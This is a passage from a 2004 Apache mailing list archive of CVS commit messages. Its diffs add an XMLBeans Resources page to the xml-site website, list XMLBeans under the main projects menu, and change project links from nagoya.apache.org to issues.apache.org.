src="../skin/images/tab-left.gif"></td><td valign="middle" bgcolor="#B2C4E0"><a class="base-not-selected" href="../resources/index.html">Resources</a></td><td valign="top" width="5" bgcolor="#B2C4E0"><img height="5" width="5" alt="" src="../skin/images/tab-right.gif"></td> +</tr> +<tr> +<td colspan="3" height="1"></td> +</tr> +</table> </td> </tr> </table> @@ -132,9 +141,6 @@ <ul> -<li> -<a href="../projectManagement/index.html#Incubation+Exit+Criteria" title="Exiting from incubation">Incubation Exit Criteria</a> -</li> <li> <a href="../projectManagement/index.html#XMLBeans+Version+1+Project+Management" title="Read a note on the progress of XMLBeans Version 1">About Version 1</a> @@ -148,13 +154,7 @@ <a href="../projectManagement/index.html#XMLBeans+Bug+Lists" title="Find or log XMLBeans bugs">Bug Tracking</a> </li> -<li> -<a href="http://nagoya.apache.org/wiki/apachewiki.cgi?XMLBeansToDo" title="Read action items, mostly regarding incubation exit criteria">To Do</a> -</li> -<li> -<a href="http://nagoya.apache.org/wiki/apachewiki.cgi?XmlBeansProposal" title="Read the original XMLBeans project proposal">Initial Proposal</a> -</li> <li> <a href="http://nagoya.apache.org/wiki/apachewiki.cgi?XmlBeansRoadMap" title="Read ideas for future evolution">XMLBeans Road Map</a> 1.1 xml-site/targets/xmlbeans/resources/index.html Index: index.html =================================================================== <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <META http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>XMLBeans Resources</title> <link type="text/css" href="../skin/page.css" rel="stylesheet"> </head> <body text="#000000" bgcolor="#FFFFFF"> <!--================= start Navigation Path ==================--> <table summary="navigation path" width="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td nowrap="nowrap" valign="middle" bgcolor="#CFDCED" height="20"><img height="1" width="5" alt="" src="../skin/images/spacer.gif" class="spacer"><!--===== breadcrumb trail (javascript-generated) ====--><font size="2" face="Arial, Helvetica, Sans-serif"><script src="../skin/breadcrumbs.js" language="JavaScript" type="text/javascript"></script></font></td> </tr> <tr> <td bgcolor="#4C6C8F" height="2"><img height="2" width="2" alt="" src="../skin/images/spacer.gif" class="spacer"></td> </tr> </table> <!--================= end Navigation Path ==================--> <!--================= start Banner ==================--> <table summary="header with logos" width="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <!--================= start Group Logo ==================--> <td bgcolor="#294563"><a href="http://xml.apache.org/"><img border="0" class="logoImage" alt="Apache XML" src="../images/group-logo.gif"></a></td> <!--================= end Group Logo ==================--> <!--================= start Project Logo ==================--><td width="100%" align="center" bgcolor="#294563"><a href="http://xml.apache.org/xmlbeans/"><img border="0" class="logoImage" alt="XMLBeans" src="../images/project-logo.gif"></a></td> <!--================= end Project Logo ==================--> <!--================= start Search ==================--><td valign="top" rowspan="2" bgcolor="#294563"> <form action="../search.cmd" method="get"> <table summary="search" border="0" cellspacing="0" cellpadding="0" bgcolor="#4C6C8F"> <tr> <td colspan="3"><img height="10" width="1" alt="" src="../skin/images/spacer.gif" class="spacer"></td> </tr> <tr> <td><img height="1" width="1" alt="" src="../skin/images/spacer.gif" class="spacer"></td><td nowrap="nowrap"><input size="15" name="query" id="query" type="text"><img height="1" width="5" alt="" src="../skin/images/spacer.gif" class="spacer"><input name="Search" value="Search" type="submit"> <br> <font face="Arial, Helvetica, Sans-serif" size="2" color="white">Powered by Apache Lucene</font></td><td><img height="1" width="1" alt="" src="../skin/images/spacer.gif" class="spacer"></td> </tr> <tr> <td><img alt="" border="0" height="10" width="9" src="../skin/images/search-left.gif"></td><td><img height="1" width="1" alt="" src="../skin/images/spacer.gif" class="spacer"></td><td><img alt="" border="0" height="10" width="9" src="../skin/images/search-right.gif"></td> </tr> </table> </form> </td> <!--================= start Search ==================--><td bgcolor="#294563"><img height="10" width="10" alt="" src="../skin/images/spacer.gif" class="spacer"></td> </tr> <tr> <td valign="bottom" bgcolor="#294563" colspan="2"> <!--================= start Tabs ==================--> <div class="tab"> <table summary="tab bar" border="0" cellpadding="0" cellspacing="0"> <tr> <td width="6"><img alt="" height="8" width="6" src="../skin/images/spacer.gif"></td><td valign="bottom"> <table summary="non selected tab" style="height: 1.6em" border="0" cellpadding="0" cellspacing="0"> <tr> <td valign="top" width="5" bgcolor="#B2C4E0"><img height="5" width="5" alt="" src="../skin/images/tab-left.gif"></td><td valign="middle" bgcolor="#B2C4E0"><a class="base-not-selected" href="../index.html">Home</a></td><td valign="top" width="5" bgcolor="#B2C4E0"><img height="5" width="5" alt="" src="../skin/images/tab-right.gif"></td> </tr> <tr> <td colspan="3" height="1"></td> </tr> </table> </td><td width="6"><img alt="" height="8" width="6" src="../skin/images/spacer.gif"></td><td valign="bottom"> <table summary="non selected tab" style="height: 1.6em" border="0" cellpadding="0" cellspacing="0"> <tr> <td valign="top" width="5" bgcolor="#B2C4E0"><img height="5" width="5" alt="" src="../skin/images/tab-left.gif"></td><td valign="middle" bgcolor="#B2C4E0"><a class="base-not-selected" href="../sourceAndBinaries/index.html">Download</a></td><td valign="top" width="5" bgcolor="#B2C4E0"><img height="5" width="5" alt="" src="../skin/images/tab-right.gif"></td> </tr> <tr> <td colspan="3" height="1"></td> </tr> </table> </td><td width="6"><img alt="" height="8" width="6" src="../skin/images/spacer.gif"></td><td valign="bottom"> <table summary="non selected tab" style="height: 1.6em" border="0" cellpadding="0" cellspacing="0"> <tr> <td valign="top" width="5" bgcolor="#B2C4E0"><img height="5" width="5" alt="" src="../skin/images/tab-left.gif"></td><td valign="middle" bgcolor="#B2C4E0"><a class="base-not-selected" href="../documentation/index.html">Documentation</a></td><td valign="top" width="5" bgcolor="#B2C4E0"><img height="5" width="5" alt="" src="../skin/images/tab-right.gif"></td> </tr> <tr> <td colspan="3" height="1"></td> </tr> </table> </td><td width="6"><img alt="" height="8" width="6" src="../skin/images/spacer.gif"></td><td valign="bottom"> <table summary="non selected tab" style="height: 1.6em" border="0" cellpadding="0" cellspacing="0"> <tr> <td valign="top" width="5" bgcolor="#B2C4E0"><img height="5" width="5" alt="" src="../skin/images/tab-left.gif"></td><td valign="middle" bgcolor="#B2C4E0"><a class="base-not-selected" href="../community/index.html">Community</a></td><td valign="top" width="5" bgcolor="#B2C4E0"><img height="5" width="5" alt="" src="../skin/images/tab-right.gif"></td> </tr> <tr> <td colspan="3" height="1"></td> </tr> </table> </td><td width="6"><img alt="" height="8" width="6" src="../skin/images/spacer.gif"></td><td valign="bottom"> <table summary="non selected tab" style="height: 1.6em" border="0" cellpadding="0" cellspacing="0"> <tr> <td valign="top" width="5" bgcolor="#B2C4E0"><img height="5" width="5" alt="" src="../skin/images/tab-left.gif"></td><td valign="middle" bgcolor="#B2C4E0"><a class="base-not-selected" href="../projectManagement/index.html">Project</a></td><td valign="top" width="5" bgcolor="#B2C4E0"><img height="5" width="5" alt="" src="../skin/images/tab-right.gif"></td> </tr> <tr> <td colspan="3" height="1"></td> </tr> </table> </td><td width="6"><img alt="" height="8" width="6" src="../skin/images/spacer.gif"></td><td valign="bottom"> <table summary="selected tab" style="height: 1.8em" border="0" cellpadding="0" cellspacing="0"> <tr> <td valign="top" width="5" bgcolor="#4C6C8F"><img height="5" width="5" alt="" src="../skin/images/tabSel-left.gif"></td><td valign="middle" bgcolor="#4C6C8F"><font color="#ffffff" size="2" face="Arial, Helvetica, Sans-serif"><b><a class="base-selected" href="../resources/index.html">Resources</a></b></font></td><td valign="top" width="5" bgcolor="#4C6C8F"><img height="5" width="5" alt="" src="../skin/images/tabSel-right.gif"></td> </tr> </table> </td> </tr> </table> </div> <!--================= end Tabs ==================--> </td><td bgcolor="#294563"><img alt="" width="1" height="1" src="../skin/images/spacer.gif" class="spacer"></td> </tr> <tr> <td bgcolor="#4C6C8F" colspan="4"><img width="1" height="10" alt="" src="../skin/images/spacer.gif" class="spacer"></td> </tr> </table> <!--================= end Banner ==================--> <!--================= start Menu, NavBar, Content ==================--> <table summary="page content" bgcolor="#ffffff" width="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td valign="top"> <table summary="menu" border="0" cellspacing="0" cellpadding="0"> <tr> <!--================= start left top NavBar ==================--> <td rowspan="3" valign="top"> <table summary="blue line" border="0" cellpadding="0" cellspacing="0"> <tr> <td bgcolor="#294563"><img width="10" height="1" alt="" src="../skin/images/spacer.gif" class="spacer"></td> </tr> <tr> <td bgcolor="#CFDCED"><font color="#4C6C8F" size="4" face="Arial, Helvetica, Sans-serif">&nbsp;</font></td> </tr> <tr> <td bgcolor="#294563"><img width="10" height="1" alt="" src="../skin/images/spacer.gif" class="spacer"></td> </tr> </table> </td> <!--================= end left top NavBar ==================--><td bgcolor="#294563"><img width="1" height="1" alt="" src="../skin/images/spacer.gif" class="spacer"></td><td valign="bottom" bgcolor="#4C6C8F"><img width="10" height="10" alt="" src="../skin/images/spacer.gif" class="spacer"></td><td nowrap="nowrap" valign="top" bgcolor="#4C6C8F"> <!--================= start Menu items ==================--> <div class="menu"> <ul> <li> <font color="#CFDCED">Resources</font> <ul> <li> <a href="../resources/index.html#XMLBeans+Tools" title="Tools for working with XMLBeans.">Tools</a> </li> <li> <a href="../resources/index.html#XMLBeans+Articles" title="Articles about or related to XMLBeans.">Articles</a> </li> <li> <a href="../resources/index.html#XMLBeans+Books" title="Books about XMLBeans">Books</a> </li> </ul> </li> </ul> </div> <!--================= end Menu items ==================--> </td><td valign="bottom" bgcolor="#4C6C8F"><img width="10" height="10" alt="" src="../skin/images/spacer.gif" class="spacer"></td><td bgcolor="#294563"><img width="1" height="1" alt="" src="../skin/images/spacer.gif" class="spacer"></td> </tr> <tr> <td valign="bottom" align="left" colspan="2" rowspan="2" bgcolor="#4C6C8F"><img height="10" width="10" border="0" alt="" src="../skin/images/menu-left.gif"></td><td bgcolor="#4C6C8F"><img height="10" width="10" alt="" src="../skin/images/spacer.gif" class="spacer"></td><td valign="bottom" align="right" colspan="2" rowspan="2" bgcolor="#4C6C8F"><img height="10" width="10" border="0" alt="" src="../skin/images/menu-right.gif"></td> </tr> <tr> <td height="1" bgcolor="#294563"><img width="1" height="1" alt="" src="../skin/images/spacer.gif" class="spacer"></td> </tr> </table> </td><td valign="top" width="100%"> <table summary="content" width="100%" border="0" cellpadding="0" cellspacing="0"> <!--================= start middle NavBar ==================--> <tr> <td colspan="4" bgcolor="#294563"><img width="10" height="1" alt="" src="../skin/images/spacer.gif" class="spacer"></td> </tr> <tr> <td align="left" width="10" bgcolor="#CFDCED"><img width="10" height="1" alt="" src="../skin/images/spacer.gif" class="spacer"></td><td align="left" width="50%" bgcolor="#CFDCED"><font color="#4C6C8F" size="3" face="Arial, Helvetica, Sans-serif"> &nbsp; </font><img width="10" height="8" alt="" src="../skin/images/spacer.gif" class="spacer"></td><td align="right" width="50%" bgcolor="#CFDCED"><font color="#4C6C8F" size="3" face="Arial, Helvetica, Sans-serif"> &nbsp; </font><img width="10" height="8" alt="" src="../skin/images/spacer.gif" class="spacer"></td><td width="10" bgcolor="#CFDCED"><img width="10" height="1" alt="" src="../skin/images/spacer.gif" class="spacer"></td> </tr> <tr> <td colspan="4" bgcolor="#294563"><img width="10" height="1" alt="" src="../skin/images/spacer.gif" class="spacer"></td> </tr> <!--================= end middle NavBar ==================--> <!--================= start Content==================--> <tr> <td align="left" width="10"><img width="10" height="1" alt="" src="../skin/images/spacer.gif" class="spacer"></td><td align="left" width="100%"> <div xmlns:xhtml="http://www.w3.org/1999/xhtml" class="content"> <table class="title" summary=""> <tr> <td valign="middle"> <h1>XMLBeans Resources</h1> </td><td nowrap="nowrap" width="40" align="center"><a class="dida" href="index.pdf"><img alt="PDF" src="../skin/images/pdfdoc.gif" class="skin"><br> PDF</a></td> </tr> </table> <a name="N1000C"></a><a name="XMLBeans+Tools"></a> <h3>XMLBeans Tools</h3> <div style="margin-left: 0 ; border: 2px"> <p> <a href="http://xmlbeans.webappshosting.com/schemaToolsV103">XMLBeans Schema Tools (XMLBeans Version 1.03)</a> &nbsp;This site allows XML Schema validation and compilation tools. You can submit an XML Schema (via file upload or cut and paste) or a set of XML Schemas (zip file) and you can download the resulting XMLBeans JAR file. </p> <ul> <li> <a href="http://xmlbeans.webappshosting.com/schemaToolsV103/validate.do">XMLBeans V1.03 Schema Validation</a> </li> <li> <a href="http://xmlbeans.webappshosting.com/schemaToolsV103/compile.do">XMLBeans V1.03 Schema Compilation</a> </li> </ul> <p> <a href="http://xmlbeans.webappshosting.com/schemaToolsV2">XMLBeans Schema Tools (XMLBeans Version 2.0)</a> &nbsp;Same as above but for XMLBeans V2.0 </p> <ul> <li> <a href="http://xmlbeans.webappshosting.com/schemaToolsV2/validate.do">XMLBeans V2.0 Schema Validation</a> </li> <li> <a href="http://xmlbeans.webappshosting.com/schemaToolsV2/compile.do">XMLBeans V2.0 Schema Compilation</a> </li> </ul> <p>Do you have or know of a tool that works with XMLBeans? Let us know and we will list it here.</p> </div> <a name="N1003E"></a><a name="XMLBeans+Articles"></a> <h3>XMLBeans Articles</h3> <div style="margin-left: 0 ; border: 2px"> <p> <a href="http://www.onjava.com/pub/a/onjava/2004/07/28/XMLBeans.html">XML-Java Data Binding Using XMLBeans</a>, onJava.com, Jul 2004<br> <a href="http://dev2dev.bea.com/technologies/xmlbeans/articles/hanson_xmlbeans_ws.jsp">Using XMLBeans in Web Service Clients and User Interfaces</a>, BEA Dev2Dev, May 2004<br> <a href="http://dev2dev.bea.com/technologies/xmlbeans/articles/XMLBeans_raj.jsp">Leveraging Complex Schema Features in Java the XMLBeans Way</a>, BEA Dev2Dev, May 2004<br> <a href="http://dev2dev.bea.com/technologies/xmlbeans/articles/xmlbeans_andrei.jsp">Strongly Typed XML in Java with XMLBeans</a>, May 2004<br> <a href="http://dev2dev.bea.com/technologies/xmlbeans/articles/ryan_xml.jsp">XML Processing with Java Object Technology</a>, May 2004<br> <a href="http://dev2dev.bea.com/products/wlworkshop81/articles/xmlbeans_dynamic_config.jsp">Using XMLBeans to Implement Dynamic Configuration Files</a>, BEA Dev2Dev, April 2004<br> <a href="http://dev2dev.bea.com/technologies/xmlbeans/articles/conaty_xmlbeans.jsp">XMLBeans as First-Class Data Objects</a>, BEA Dev2Dev, May 2004<br> <a href="http://javaboutique.internet.com/reviews/xml_javabeans/">Converting XML to JavaBeans with XMLBeans</a>, JavaBoutique<br> <a href="http://dev2dev.bea.com/technologies/xmlbeans/articles/traut.jsp">Handling Mixed Content in a Strongly-Typed World</a>, BEA Dev2Dev, Nov 2003<br> <a href="http://davidbau.com/archives/2003/11/14/the_design_of_xmlbeans_part_1.html">The Design of XMLBeans (Part 1)</a>, davidbau.com, Nov 2003<br> <a href="http://davidbau.com/archives/2003/11/19/the_design_of_xmlbeans_part_2.html">The Design of XMLBeans (Part 2)</a>, davidbau.com, Nov 2003<br> <a href="http://davidbau.com/archives/2003/12/18/the_design_of_xmlbeans_part_3.html">The Design of XMLBeans (Part 3)</a>, davidbau.com, Dec 2003<br> <a href="http://www.devx.com/xml/Article/17495">XML Made Easy with XMLBeans</a>, DevX.com, Oct 2003<br> <a href="http://www.sys-con.com/xml/article.cfm?id=614">XML Beans: The Best of Both Worlds</a>, XML Journal, June 2003<br> <a href="http://dev2dev.bea.com/technologies/xmlbeans/articles/Bau.jsp">XML Beans (by David Bau)</a>, BEA Dev2Dev, Mar 2003<br> <a href="http://dev2dev.bea.com/technologies/xmlbeans/articles/DJ_003.jsp">Dear John (Column #3) - An XMLBeans Example: Address Book</a>, BEA Dev2Dev, Feb 2003 <br> </p> <p>Do you know of an XMLBeans article that is not listed here? Let us know and we will list it here.</p> </div> <a name="N100AB"></a><a name="XMLBeans+Books"></a> <h3>XMLBeans Books</h3> <div style="margin-left: 0 ; border: 2px"> <p>Are you writing a book on XMLBeans? If so let us know and we will list it here</p> </div> <div class="attribution"></div> </div> </td><td width="10"><img width="10" height="1" alt="" src="../skin/images/spacer.gif" class="spacer"></td> </tr> <!--================= end Content==================--> </table> </td> </tr> </table> <!--================= end Menu, NavBar, Content ==================--> <!--================= start Footer ==================--> <table summary="footer" cellspacing="0" cellpadding="0" width="100%" border="0"> <tr> <td colspan="2" height="1" bgcolor="#4C6C8F"><img height="1" width="1" alt="" src="../skin/images/spacer.gif" class="spacer"><a href="../skin/images/label.gif"></a><a href="../skin/images/page.gif"></a><a href="../skin/images/chapter.gif"></a><a href="../skin/images/chapter_open.gif"></a><a href="../skin/images/current.gif"></a><a href="/favicon.ico"></a></td> </tr> <tr> <td colspan="2" bgcolor="#CFDCED" class="copyright" align="center"><font size="2" face="Arial, Helvetica, Sans-Serif">Copyright &copy; 2003&nbsp;The Apache Software Foundation. All rights reserved.<script type="text/javascript" language="JavaScript"><!-- document.write(" - "+"Last Published: " + document.lastModified); // --></script></font></td> </tr> <tr> <td colspan="2" align="left" bgcolor="#CFDCED" class="logos"> <div> <a href="http://validator.w3.org/check/referer"><img width="88" height="31" alt="Valid HTML 4.01!" src="../skin/images/valid-html401.png" class="logoImage"></a><a href="http://jigsaw.w3.org/css-validator/"><img width="88" height="31" alt="Valid CSS!" src="../skin/images/vcss.png" class="logoImage"></a><img alt="" height="1" width="10" src="../skin/images/spacer.gif"><a href="http://xml.apache.org/forrest/"><img border="0" alt="Built with Forrest logo" src="../images/built-with-forrest-button.png" width="88" height="31"><img height="1" width="5" alt="" src="../skin/images/spacer.gif" class="spacer"></a> </div> </td> </tr> </table> <!--================= end Footer ==================--> </body> </html> 1.1 xml-site/targets/xmlbeans/resources/index.pdf <<Binary file>> 1.7 +9 -0 xml-site/targets/xmlbeans/sourceAndBinaries/index.html Index: index.html =================================================================== RCS file: /home/cvs/xml-site/targets/xmlbeans/sourceAndBinaries/index.html,v retrieving revision 1.6 retrieving revision 1.7 diff -u -r1.6 -r1.7 --- index.html 22 Jul 2004 23:32:00 -0000 1.6 +++ index.html 5 Aug 2004 00:40:44 -0000 1.7 @@ -91,6 +91,15 @@ <td colspan="3" height="1"></td> </tr> </table> +</td><td width="6"><img alt="" height="8" width="6" src="../skin/images/spacer.gif"></td><td valign="bottom"> +<table summary="non selected tab" style="height: 1.6em" border="0" cellpadding="0" cellspacing="0"> +<tr> +<td valign="top" width="5" bgcolor="#B2C4E0"><img height="5" width="5" alt="" src="../skin/images/tab-left.gif"></td><td valign="middle" bgcolor="#B2C4E0"><a class="base-not-selected" href="../resources/index.html">Resources</a></td><td valign="top" width="5" bgcolor="#B2C4E0"><img height="5" width="5" alt="" src="../skin/images/tab-right.gif"></td> +</tr> +<tr> +<td colspan="3" height="1"></td> +</tr> +</table> </td> </tr> </table> --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sat Aug 07 17:27:03 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 43322 invoked from network); 7 Aug 2004 17:27:03 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 7 Aug 2004 17:27:03 -0000 Received: (qmail 43835 invoked by uid 500); 7 Aug 2004 17:27:00 -0000 Delivered-To: [email protected] Received: (qmail 43814 invoked by uid 500); 7 Aug 2004 17:27:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk Reply-To: [email protected] list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 53447 invoked by uid 500); 7 Aug 2004 00:22:45 -0000 Delivered-To: [email protected] X-ASF-Spam-Status: No, hits=-2.8 required=10.0 tests=ALL_TRUSTED,NO_REAL_NAME X-Spam-Check-By: apache.org Date: 7 Aug 2004 00:22:43 -0000 Message-ID: <[email protected]> From: [email protected] To: [email protected] Subject: cvs commit: xml-site/src/documentation/content/xdocs book.xml index.xml X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N cliffs 2004/08/06 17:22:43 Modified: src/documentation/content/xdocs book.xml index.xml Log: updated xmlbeans links and info Revision Changes Path 1.13 +3 -1 xml-site/src/documentation/content/xdocs/book.xml Index: book.xml =================================================================== RCS file: /home/cvs/xml-site/src/documentation/content/xdocs/book.xml,v retrieving revision 1.12 retrieving revision 1.13 diff -u -r1.12 -r1.13 --- book.xml 22 Jun 2004 02:51:20 -0000 1.12 +++ book.xml 7 Aug 2004 00:22:43 -0000 1.13 @@ -31,10 +31,12 @@ <menu-item href="http://xml.apache.org/security/index.html" label="XML Security" /> <menu-item href="http://xml.apache.org/xindice/" label="Xindice" /> <menu-item href="http://axkit.org" label="AxKit" /> + <menu-item href="http://xmlbeans.apache.org/" label="XMLBeans" /> </menu> +<!-- <menu label="Incubating Projects"> - <menu-item href="http://xml.apache.org/xmlbeans" label="XMLBeans" /> </menu> +--> <menu label="WS Projects"> <menu-item href="http://ws.apache.org/axis/index.html" label="Axis" /> <menu-item href="http://ws.apache.org/soap/index.html" label="SOAP" /> 1.13 +19 -0 xml-site/src/documentation/content/xdocs/index.xml Index: index.xml =================================================================== RCS file: /home/cvs/xml-site/src/documentation/content/xdocs/index.xml,v retrieving revision 1.12 retrieving revision 1.13 diff -u -r1.12 -r1.13 --- index.xml 18 Apr 2004 07:55:27 -0000 1.12 +++ index.xml 7 Aug 2004 00:22:43 -0000 1.13 @@ -65,6 +65,9 @@ <li> <em>XML Commons</em> - focussed on common code and guidelines for xml projects </li> + <li> + <em>XMLBeans</em> - XML-Java binding tool with 100% support of XML Schema. + </li> </ul> <section id="xerces"> <title>Xerces: XML parsers in Java and C++ (plus Perl and COM)</title> @@ -195,6 +198,22 @@ xml.apache.org subprojects. </p> </section> + <section id="xmlbeans"> + <title>XMLBeans: XML-Java binding tool</title> + <p>XMLBeans is a tool that allows you to access the full power of XML + in a Java friendly way. The idea is that you can take advantage the + richness and features of XML and XML Schema and have these features mapped + as naturally as possible to the equivalent Java language and typing constructs. + XMLBeans uses XML Schema to compile Java interfaces and classes that you can + then use to access and modify XML instance data. Using XMLBeans is similar + to using any other Java interface/class, you will see things like getFoo or + setFoo just as you would expect when working with Java. While a major use + of XMLBeans is to access your XML instance data with strongly typed Java + classes there are also API's that allow you access to the full XML infoset + (XMLBeans keeps full XML Infoset fidelity) as well as to allow you to reflect + into the XML schema itself through an XML Schema Object model. + </p> + </section> </section> <section id="participation"> <title>Anyone Can Participate</title> --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Aug 26 20:32:01 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 31250 invoked from network); 26 Aug 2004 20:32:01 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 26 Aug 2004 20:32:01 -0000 Received: (qmail 57912 invoked by uid 500); 26 Aug 2004 20:32:01 -0000 Delivered-To: [email protected] Received: (qmail 57887 invoked by uid 500); 26 Aug 2004 20:32:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk Reply-To: [email protected] list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 57867 invoked by uid 500); 26 Aug 2004 20:32:00 -0000 Delivered-To: [email protected] X-ASF-Spam-Status: No, hits=-2.8 required=10.0 tests=ALL_TRUSTED,NO_REAL_NAME X-Spam-Check-By: apache.org Date: 26 Aug 2004 20:31:59 -0000 Message-ID: <[email protected]> From: [email protected] To: [email protected] Subject: cvs commit: xml-site/targets/skin page.css X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N cliffs 2004/08/26 13:31:59 Modified: targets ack.html communication.html contact.html cvs.html decisions.html guidelines.html index.html index.pdf legal.html library.html mail.html mail.pdf management.html mirrors.html mission.html news.html overview.html roles.html source.html whoweare.html targets/skin page.css Log: updating site with new XMLBeans location. Revision Changes Path 1.45 +4 -10 xml-site/targets/ack.html Index: ack.html =================================================================== RCS file: /home/cvs/xml-site/targets/ack.html,v retrieving revision 1.44 retrieving revision 1.45 diff -u -r1.44 -r1.45 --- ack.html 13 Jun 2004 09:06:18 -0000 1.44 +++ ack.html 26 Aug 2004 20:31:56 -0000 1.45 @@ -169,15 +169,9 @@ <li> <a href="http://axkit.org">AxKit</a> </li> - -</ul> -</li> -<li> -<font color="#CFDCED">Incubating Projects</font> -<ul> - + <li> -<a href="http://xml.apache.org/xmlbeans">XMLBeans</a> +<a href="http://xmlbeans.apache.org/">XMLBeans</a> </li> </ul> @@ -252,11 +246,11 @@ </li> <li> -<a href="http://nagoya.apache.org/bugzilla/">Bug Database</a> +<a href="http://issues.apache.org/bugzilla/">Bug Database</a> </li> <li> -<a href="http://nagoya.apache.org/wiki/apachewiki.cgi">Wiki</a> +<a href="http://issues.apache.org/wiki/apachewiki.cgi">Wiki</a> </li> <li> 1.45 +4 -10 xml-site/targets/communication.html Index: communication.html =================================================================== RCS file: /home/cvs/xml-site/targets/communication.html,v retrieving revision 1.44 retrieving revision 1.45 diff -u -r1.44 -r1.45 --- communication.html 13 Jun 2004 09:06:18 -0000 1.44 +++ communication.html 26 Aug 2004 20:31:56 -0000 1.45 @@ -169,15 +169,9 @@ <li> <a href="http://axkit.org">AxKit</a> </li> - -</ul> -</li> -<li> -<font color="#CFDCED">Incubating Projects</font> -<ul> - + <li> -<a href="http://xml.apache.org/xmlbeans">XMLBeans</a> +<a href="http://xmlbeans.apache.org/">XMLBeans</a> </li> </ul> @@ -252,11 +246,11 @@ </li> <li> -<a href="http://nagoya.apache.org/bugzilla/">Bug Database</a> +<a href="http://issues.apache.org/bugzilla/">Bug Database</a> </li> <li> -<a href="http://nagoya.apache.org/wiki/apachewiki.cgi">Wiki</a> +<a href="http://issues.apache.org/wiki/apachewiki.cgi">Wiki</a> </li> <li> 1.43 +4 -10 xml-site/targets/contact.html Index: contact.html =================================================================== RCS file: /home/cvs/xml-site/targets/contact.html,v retrieving revision 1.42 retrieving revision 1.43 diff -u -r1.42 -r1.43 --- contact.html 13 Jun 2004 09:06:18 -0000 1.42 +++ contact.html 26 Aug 2004 20:31:56 -0000 1.43 @@ -169,15 +169,9 @@ <li> <a href="http://axkit.org">AxKit</a> </li> - -</ul> -</li> -<li> -<font color="#CFDCED">Incubating Projects</font> -<ul> - + <li> -<a href="http://xml.apache.org/xmlbeans">XMLBeans</a> +<a href="http://xmlbeans.apache.org/">XMLBeans</a> </li> </ul> @@ -252,11 +246,11 @@ </li> <li> -<a href="http://nagoya.apache.org/bugzilla/">Bug Database</a> +<a href="http://issues.apache.org/bugzilla/">Bug Database</a> </li> <li> -<a href="http://nagoya.apache.org/wiki/apachewiki.cgi">Wiki</a> +<a href="http://issues.apache.org/wiki/apachewiki.cgi">Wiki</a> </li> <li> 1.51 +2 -8 xml-site/targets/cvs.html Index: cvs.html =================================================================== RCS file: /home/cvs/xml-site/targets/cvs.html,v retrieving revision 1.50 retrieving revision 1.51 diff -u -r1.50 -r1.51 --- cvs.html 18 Jul 2004 15:42:49 -0000 1.50 +++ cvs.html 26 Aug 2004 20:31:56 -0000 1.51 @@ -169,15 +169,9 @@ <li> <a href="http://axkit.org">AxKit</a> </li> - -</ul> -</li> + <li> -<font color="#CFDCED">Incubating Projects</font> -<ul> - -<li> -<a href="http://xml.apache.org/xmlbeans">XMLBeans</a> +<a href="http://xmlbeans.apache.org/">XMLBeans</a> </li> </ul> 1.45 +4 -10 xml-site/targets/decisions.html Index: decisions.html =================================================================== RCS file: /home/cvs/xml-site/targets/decisions.html,v retrieving revision 1.44 retrieving revision 1.45 diff -u -r1.44 -r1.45 --- decisions.html 13 Jun 2004 09:06:18 -0000 1.44 +++ decisions.html 26 Aug 2004 20:31:56 -0000 1.45 @@ -169,15 +169,9 @@ <li> <a href="http://axkit.org">AxKit</a> </li> - -</ul> -</li> -<li> -<font color="#CFDCED">Incubating Projects</font> -<ul> - + <li> -<a href="http://xml.apache.org/xmlbeans">XMLBeans</a> +<a href="http://xmlbeans.apache.org/">XMLBeans</a> </li> </ul> @@ -252,11 +246,11 @@ </li> <li> -<a href="http://nagoya.apache.org/bugzilla/">Bug Database</a> +<a href="http://issues.apache.org/bugzilla/">Bug Database</a> </li> <li> -<a href="http://nagoya.apache.org/wiki/apachewiki.cgi">Wiki</a> +<a href="http://issues.apache.org/wiki/apachewiki.cgi">Wiki</a> </li> <li> 1.53 +4 -10 xml-site/targets/guidelines.html Index: guidelines.html =================================================================== RCS file: /home/cvs/xml-site/targets/guidelines.html,v retrieving revision 1.52 retrieving revision 1.53 diff -u -r1.52 -r1.53 --- guidelines.html 13 Jun 2004 09:06:18 -0000 1.52 +++ guidelines.html 26 Aug 2004 20:31:57 -0000 1.53 @@ -169,15 +169,9 @@ <li> <a href="http://axkit.org">AxKit</a> </li> - -</ul> -</li> -<li> -<font color="#CFDCED">Incubating Projects</font> -<ul> - + <li> -<a href="http://xml.apache.org/xmlbeans">XMLBeans</a> +<a href="http://xmlbeans.apache.org/">XMLBeans</a> </li> </ul> @@ -252,11 +246,11 @@ </li> <li> -<a href="http://nagoya.apache.org/bugzilla/">Bug Database</a> +<a href="http://issues.apache.org/bugzilla/">Bug Database</a> </li> <li> -<a href="http://nagoya.apache.org/wiki/apachewiki.cgi">Wiki</a> +<a href="http://issues.apache.org/wiki/apachewiki.cgi">Wiki</a> </li> <li> 1.64 +40 -20 xml-site/targets/index.html Index: index.html =================================================================== RCS file: /home/cvs/xml-site/targets/index.html,v retrieving revision 1.63 retrieving revision 1.64 diff -u -r1.63 -r1.64 --- index.html 13 Jun 2004 09:06:18 -0000 1.63 +++ index.html 26 Aug 2004 20:31:57 -0000 1.64 @@ -151,13 +151,8 @@ <li> 